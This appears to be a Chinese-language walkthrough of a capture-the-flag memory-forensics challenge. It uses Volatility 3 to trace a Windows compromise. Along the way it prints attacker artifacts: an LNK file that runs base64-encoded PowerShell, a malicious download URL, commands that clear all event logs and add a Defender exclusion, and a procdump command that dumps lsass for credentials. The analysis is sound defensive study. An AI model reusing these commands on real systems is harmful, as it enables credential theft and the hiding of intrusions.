介绍 哦不!我们的 IT 管理员有点傻乎乎的,ByteSparkle 把他的 VPN 配置文件留在了我们精美的私人 S3 位置!这些卑鄙的攻击者可能已经获得了我们内部网络的访问权限。我们认为他们入侵了我们的一个 TinkerTech 工作站。我们的安全团队设法获取了您的内存转储 - 请对其进行分析并回答问题!圣诞老人正在等待……请注意 - 这些 Sherlock 是按顺序构建的!
是一个内存镜像,但是vol2跑不出来,可能win的版本比较高,用vol3
┌──(mikannse㉿kali)-[~/Desktop] └─$ vol3 -f ./santaclaus.bin windows.info <SNIP> Variable Value Kernel Base 0xf8055be18000 DTB 0x1aa000 Symbols file:///home/mikannse/tools/other/volatility3/volatility3/symbols/windows/ntkrnlmp.pdb/CA8E2F01B822EDE6357898BFBF862997-1.json.xz Is64Bit True IsPAE False layer_name 0 WindowsIntel32e memory_layer 1 FileLayer KdVersionBlock 0xf8055ca27368 Major/Minor 15.19041 MachineType 34404 KeNumberProcessors 1 SystemTime 2023-11-30 16:59:33 NtSystemRoot C:\Windows NtProductType NtProductWinNt NtMajorVersion 10 NtMinorVersion 0 PE MajorOperatingSystemVersion 10 PE MinorOperatingSystemVersion 0 PE Machine 34404 PE TimeDateStamp Wed Jan 4 04:27:11 1995
可能从共享文件夹复制的文件的名称是什么(包括文件扩展名)? ┌──(mikannse㉿kali)-[~/Desktop] └─$ vol3 -f ./santaclaus.bin windows.filescan >file_scan
┌──(mikannse㉿kali)-[~/Desktop] └─$ cat file_scan | grep -F "\\Users\\santaclaus\\" 0xa48df8fb1a00 \Users\santaclaus\Desktop\present_for_santa\present_for_santa 216 0xa48df8fb3170 \Users\santaclaus\AppData\Roaming\Microsoft\Windows\Printer Shortcuts 216 0xa48df8fb3300 \Users\santaclaus\AppData\Roaming\Microsoft\Windows\Printer Shortcuts 216 0xa48df8fb3940 \Users\santaclaus\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini 216 0xa48df8fb3ad0 \Users\santaclaus\AppData\Roaming\Microsoft\Windows\Network Shortcuts 216 0xa48df8fb3c60 \Users\santaclaus\AppData\Local\Microsoft\Windows\Burn 216 0xa48df8fb4110 \Users\santaclaus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned 216 0xa48df8fb42a0 \Users\santaclaus\Desktop\present_for_santa.zip 216 <SNIP>
有一个present_for_santa.zip
用于触发攻击的文件名是什么(包括文件扩展名)? 需要把上一问的文件转存下来
┌──(mikannse㉿kali)-[~/Desktop] └─$ vol3 -f ./santaclaus.bin windows.dumpfiles --virtaddr 0xa48df8fb42a0 Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished Cache FileObject FileName Result DataSectionObject 0xa48df8fb42a0 present_for_santa.zip file.0xa48df8fb42a0.0xa48dfbf1ba20.DataSectionObject.present_for_santa.zip.dat
解压
┌──(mikannse㉿kali)-[~/Desktop] └─$ unzip santa.zip Archive: santa.zip inflating: present_for_santa/click_for_present.lnk inflating: present_for_santa/present.vbs
┌──(mikannse㉿kali)-[~/Desktop/present_for_santa] └─$ cat click_for_present.lnk P�O� �:i�+00�/C:\V1Windows@ ��.WindowsZ1System32B ��.System32▒t1WindowsPowerShellT ��.WindowsPowerShell N1v1.0: ��.v1.0l2powershell.exeN ��.powershell.exeTrick or treatB..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exep-ep bypass -enc JABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEMAOgBcAFUAcwBlAHIAcwBcACIAIAAtAEYAaQBsAHQAZQByACAAIgBwAHIAZQBzAGUAbgB0ACoALgB2AGIAcwAiACAALQBGAGkAbABlACAALQBSAGUAYwB1AHIAcwBlAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABGAHUAbABsAE4AYQBtAGUAOwBjAHMAYwByAGkAcAB0ACAAJABmAGkAbABlAA==C:\Windows\System32\shell32.dll�%SystemRoot%\System32\shell32.dll%SystemRoot%\System32\shell32.dll�%� �wN�▒�]N�D.��Q���� ��1SPS��XF�L8C���&�m�m.S-1-5-21-3849600975-1564034632-632203374-1001
┌──(mikannse㉿kali)-[~/Desktop/present_for_santa] └─$ echo JABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEMAOgBcAFUAcwBlAHIAcwBcACIAIAAtAEYAaQBsAHQAZQByACAAIgBwAHIAZQBzAGUAbgB0ACoALgB2AGIAcwAiACAALQBGAGkAbABlACAALQBSAGUAYwB1AHIAcwBlAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABGAHUAbABsAE4AYQBtAGUAOwBjAHMAYwByAGkAcAB0ACAAJABmAGkAbABlAA== |base64 -d $file = Get-ChildItem -Path "C:\Users\" -Filter " present*.vbs" -File -Recurse| Select-Object -ExpandProperty FullName;cscript $file
点击这个快捷方式则会执行另一个vbs脚本
click_for_present.lnk 执行的文件的名称是什么(包括文件扩展名)? present.vbs
vbs脚本用来执行下一阶段的程序名是什么? 使用virustotal,查看Processes created
https://www.virustotal.com/gui/file/78ba1ea3ac992391010f23b346eedee69c383bc3fd2d3a125ede6cba3ce77243/behavior
powershell.exe
下一阶段下载的 URL 是什么? 看HTTP requests
http://77.74.198.52/destroy_christmas/evil_present.jpg
可执行文件从哪个 IP 和端口下载 shellcode(IP:Port)? 分析可知present.exe用于远程下载shellcode并执行,分离出来
┌──(mikannse㉿kali)-[~/Desktop] └─$ vol3 -f ./santaclaus.bin windows.dumpfiles --virtaddr 0xa48df8fd7520 Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished Cache FileObject FileName Result DataSectionObject 0xa48df8fd7520 present.exe file.0xa48df8fd7520.0xa48dfe212c30.DataSectionObject.present.exe.dat ImageSectionObject 0xa48df8fd7520 present.exe file.0xa48df8fd7520.0xa48dff93a270.ImageSectionObject.present.exe.img
上传至virustotal,查看Network Communication
77.74.198.52:445
注入 shellcode 的远程进程的进程 ID 是什么? 涉及到网络连接,查看网络情况
┌──(mikannse㉿kali)-[~/Desktop] └─$ vol3 -f ./santaclaus.bin windows.netscan >net_scan ┌──(mikannse㉿kali)-[~/Desktop] └─$ cat net_scan|grep 77.74.198.52 0xa48df88db790 TCPv4 192.168.68.6 49687 77.74.198.52 447 ESTABLISHED 724 svchost.exe 2023-11-30 16:42:41.000000
724
攻击者建立命令和控制连接后,他们使用什么命令清除所有事件日志? 虽然清除了日志信息但是清理的命令还是在事件日志中
┌──(mikannse㉿kali)-[~/Desktop] └─$ cat file_scan |grep -i "powershell.evtx" 0xa48dfefe6e50 \Windows\System32\winevt\Logs\Windows PowerShell.evtx 216 ┌──(mikannse㉿kali)-[~/Desktop] └─$ vol3 -f ./santaclaus.bin windows.dumpfiles --virtaddr 0xa48dfefe6e50 Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished Cache FileObject FileName Result DataSectionObject 0xa48dfefe6e50 Windows PowerShell.evtx Error dumping file SharedCacheMap 0xa48dfefe6e50 Windows PowerShell.evtx file.0xa48dfefe6e50.0xa48dfef8b010.SharedCacheMap.Windows PowerShell.evtx.vacb
一共就25个事件,在最早的那个事件找到
Get-EventLog -List | ForEach-Object { Clear-EventLog -LogName $_ .Log }
从 defender 中排除的文件夹的完整路径是什么? 意思应该是把什么目录列入了defender的白名单
在事件中找到一条:powershell.exe Add-MpPreference -ExclusionPath c:\users\public
c:\users\public
感染受害者的文件的原始名称是什么? 在最新的事件中找到
powershell.exe C:\Users\public\PresentForNaughtyChild.exe -accepteula -r -ma lsass.exe C:\Users\public\stolen_gift.dmp
将这个PresentForNaughtyChild.exe分离出来
┌──(mikannse㉿kali)-[~/Desktop] └─$ cat file_scan |grep -i "PresentForNaughtyChild.exe" 0xa48e00d10a90 \Users\Public\PresentForNaughtyChild.exe 216 ┌──(mikannse㉿kali)-[~/Desktop] └─$ vol3 -f ./santaclaus.bin windows.dumpfiles --virtaddr 0xa48e00d10a90 Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished Cache FileObject FileName Result DataSectionObject 0xa48e00d10a90 PresentForNaughtyChild.exe file.0xa48e00d10a90.0xa48dfe2179b0.DataSectionObject.PresentForNaughtyChild.exe.dat ImageSectionObject 0xa48e00d10a90 PresentForNaughtyChild.exe file.0xa48e00d10a90.0xa48e005f02a0.ImageSectionObject.PresentForNaughtyChild.exe.img
┌──(mikannse㉿kali)-[~/Desktop] └─$ file Naughty.exe Naughty.exe: PE32 executable (console) Intel 80386, for MS Windows, 5 sections ┌──(mikannse㉿kali)-[~/Desktop] └─$ exiftool Naughty.exe ExifTool Version Number : 12.76 File Name : Naughty.exe Directory : . File Size : 795 kB File Modification Date/Time : 2024:09:16 22:34:42+08:00 File Access Date/Time : 2024:09:16 22:35:15+08:00 File Inode Change Date/Time : 2024:09:16 22:35:12+08:00 File Permissions : -rw------- File Type : Win32 EXE File Type Extension : exe MIME Type : application/octet-stream Machine Type : Intel 386 or later, and compatibles Time Stamp : 2022:10:19 01:51:38+08:00 Image File Characteristics : Executable, 32-bit PE Type : PE32 Linker Version : 14.33 Code Size : 221696 Initialized Data Size : 568320 Uninitialized Data Size : 0 Entry Point : 0x168d9 OS Version : 6.0 Image Version : 0.0 Subsystem Version : 6.0 Subsystem : Windows command line File Version Number : 11.0.0.0 Product Version Number : 11.0.0.0 File Flags Mask : 0x0017 File Flags : (none) File OS : Win32 Object File Type : Unknown File Subtype : 0 Language Code : English (U.S.) Character Set : Unicode Company Name : Sysinternals - www.sysinternals.com File Description : Sysinternals process dump utility File Version : 11.0 Internal Name : ProcDump Legal Copyright : Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards Original File Name : procdump Product Name : ProcDump Product Version : 11.0
原始文件名是Prodump.exe
procdump.exe 所针对的进程名称是什么? lsass.exe
